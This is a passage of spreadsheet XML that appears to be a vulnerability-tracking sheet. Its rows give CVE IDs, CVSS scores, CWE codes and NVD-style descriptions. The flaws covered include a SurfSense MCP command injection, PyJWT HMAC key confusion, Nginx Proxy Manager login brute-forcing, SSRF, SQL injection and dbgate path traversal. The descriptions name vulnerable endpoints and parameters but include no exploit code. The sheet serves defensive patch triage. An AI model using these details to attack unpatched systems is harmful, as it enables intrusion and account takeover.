      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in MODSetter SurfSense up to 2.0.3. This issue affects some unknown processing of the file /api/search-source/connectors/mcp/test of the component MCP Connector Integration. Such manipulation leads to command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102243</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102266</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>python, go, rust</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, HMACAlgorithm.from_jwk is affected because PyJWK verification path used the decoded key without applying prepare_key validation. This occurs when a trusted JWK Set contains an oct entry with an empty k value. As a result, an attacker signs an HMAC token with the same zero-length key accepted by PyJWT. Consequently, forged token can carry arbitrary authenticated claims. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102266</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102267</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>python, rust</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-345, CWE-918</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT PyJWKClient is affected because redirect destinations are not revalidated against the JWKS trust boundary. This occurs when a configured trusted JWKS endpoint returns an attacker-influenced redirect. As a result, PyJWKClient follows the redirect and consumes the redirected response as key material. Consequently, forwarded credentials may be disclosed or verification keys may be substituted. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102267</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102271</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.4.0 until 2.14.0, PyJWT HMACAlgorithm.prepare_key is affected because asymmetric-key guard relies on textual markers that are absent from DER encoding. This occurs when an application mixes HMAC and asymmetric algorithms and supplies a DER public key as the shared verification key. As a result, PyJWT uses public DER bytes as an HMAC secret. Consequently, an attacker who knows the public key can forge authenticated HMAC tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102271</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102272</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, HMACAlgorithm.prepare_key in jwt/algorithms.py is affected because raw-JWK detector does not normalize accepted Unicode byte-order marks before checking for JSON. This occurs when a public JWK is prefixed with a UTF-8 BOM and used in a mixed-algorithm verification path. As a result, public JWK bypasses asymmetric-key detection and becomes the HMAC secret. Consequently, an attacker who knows the public key can forge authenticated tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102272</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102273</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWT HMACAlgorithm.prepare_key is affected because HMAC key guard only recognizes top-level public JWK forms and misses container representations. This occurs when an application allows HMAC and asymmetric algorithms and passes a public JWK container as the raw key. As a result, public asymmetric key material is accepted as the HMAC secret. Consequently, an attacker who knows the public key can forge a token with arbitrary authenticated claims. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102273</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102334</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>nginx, gin</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Nginx Proxy Manager through 2.16.0 lacks rate-limiting on authentication endpoints, allowing unauthenticated attackers to make unlimited password guesses against any account. Attackers can brute-force login credentials via POST /api/tokens and subsequently guess TOTP codes via POST /api/tokens/2fa to gain full session access and administrative control.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102334</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82375</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) in Apache Roller 6.1.5 allows an authenticated user with entry-editing rights on a weblog to cause outbound HTTP requests to attacker-chosen destinations through legacy outbound Trackback and entry enclosure handling. The Trackback control is hidden in the standard UI, but its action remains directly reachable; the enclosure path is relevant only when an author supplies an enclosure URL. No non-default server configuration is required, and the default empty Trackback allow-list permits all destinations. Requests can reach loopback and private-network addresses, while enclosure handling exposes response status, content type, and length. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes the outbound trackback action and stops dereferencing enclosure URLs.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82375</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101012</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This impacts an unknown function of the file makeresult.php. This manipulation of the argument makeid causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101012</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101015</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-20</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this issue is some unknown functionality of the file policy.c of the component Domain Handler. Executing a manipulation can lead to improper validation of unsafe equivalence in input. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101015</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101066</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in dbgate up to 7.3.1. The impacted element is the function createLink of the file packages/api/src/controllers/archive.js of the component Archive Link Creation. This manipulation of the argument linkedFolder causes path traversal. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101066</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101067</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in dbgate up to 6.8.1/7.0.2/7.1.8/7.2.5/7.3.1. This affects the function saveUploadedFile of the file files.js of the component save-uploaded-file Endpoint. Such manipulation of the argument filePath/fileName leads to path traversal. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101067</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101280</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-290</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Trusted Domain Project OpenDMARC up to 1.4.2. Affected is the function opendmarc_policy_query_dmarc of the component Multi-Record Set Handler. The manipulation results in authentication bypass by spoofing. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101280</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101281</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_sp2_find_mailfrom_domain of the file libopendmarc/opendmarc_spf.c of the component SPF Macro Handler. This manipulation causes improper authentication. The attack is possible to be carried out remotely. The exploit has been published and may be used. Patch name: c48a74c758677fc5272a73eff15ffdbf8afda1a6. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101281</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102245</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in MODSetter SurfSense up to 2.0.3. The affected element is an unknown function of the file surfsense_backend/app/routes/circleback_webhook_route.py of the component circleback Endpoint. Executing a manipulation can lead to missing authentication. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102245</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102248</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
